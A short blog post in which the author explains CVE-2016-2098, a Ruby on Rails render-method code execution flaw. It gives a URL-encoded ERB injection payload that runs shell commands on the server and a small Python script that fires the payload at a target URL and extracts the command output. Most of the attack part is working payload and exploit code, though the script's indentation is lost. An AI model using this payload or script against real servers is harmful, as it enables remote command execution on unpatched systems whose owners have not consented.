CVE-2016-2098 Python POC
- by Vince
-
in Blog
-
Hits: 2674
"Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method."
I realize that I'm not going to understand everything but at times I feel like I'm nothing more than a really determined script kiddie. That said, this seemed like something I could grasp and when I came across the vulnerable server, I found a Metasploit module for exploiting it. After reading through the Ruby, about Ruby, without having much experience with Ruby, I was none the wiser.
I looked for alternative exploit code in the various locations to get a better understanding but what I found were elaborate examples. In hindsight, I'm not sure for what. I just wanted to maybe grasp what exactly was going on without pointing Metasploit at it.
Searching a bit more, I found a smaller proof of concept and while digging through it, I could see what was happening. Basically, you have a url:
http://victim/pages?id=something
Our interaction is happening past: ?id
http://victim/pages?id=something
http://victim/pages?id[inline]=%3C%25=%20%25x(INSERT COMMAND HERE)%20%25%3E
http://victim/pages?id[inline]=%3C%25=%20%25x(id)%20%25%3E
Line one is our original, line two is the encoded exploitation, and line three is asking for "id".
Playing with Python, I wrote this little script to take the URL, pass "id" and parse the output to clean up all the noise in the response:
import urllib2
import requests
host = raw_input("Enter target Url eg (http://victim/pages?id) : ")
url = urllib2.urlopen(host + "[inline]=%3C%25=%20%25x(id)%20%25%3E")
html = url.readlines()
for line in html:
if 'uid=' in line:
print
print line
You can also work with this straight in the browser:
http://victim/pages?id[inline]=%3C%25=%20%25x(id)%20%25%3E